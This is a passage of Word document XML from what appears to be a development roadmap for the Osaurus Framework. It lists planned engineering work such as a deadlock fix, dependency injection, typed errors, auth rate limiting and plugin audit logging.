        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Fix ChatEngine MainActor deadlock risk (#25)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Group ChatSession @Published properties to reduce cascading redraws (#39)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Enable skipped CI test suites on Apple Silicon runners (#47)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Add auth failure rate limiting (#11)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E86C1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Medium-Term (Next Quarter)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Architectural improvements for long-term maintainability:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Introduce dependency injection container to replace 30+ singletons (#24)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Unify execution state across ChatSession/WorkSession/BackgroundTask (#29)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Replace NSError with typed error enums across all services (#26)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Implement shared TokenCounter service with real tokenizer (#27)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Re-enable SwiftLint rules with reasonable thresholds (#50)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Implement plugin audit logging (#37)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Refactor FloatingInputCard to reduce parameter count (#42)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Add comprehensive UI test suite (#49)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tabs>
        <w:tab w:val="right" w:pos="9026"/>
      </w:tabs>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="888888"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">Osaurus Framework — Source Code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2026-04-12T12:58:44.291Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-12T12:58:44.291Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>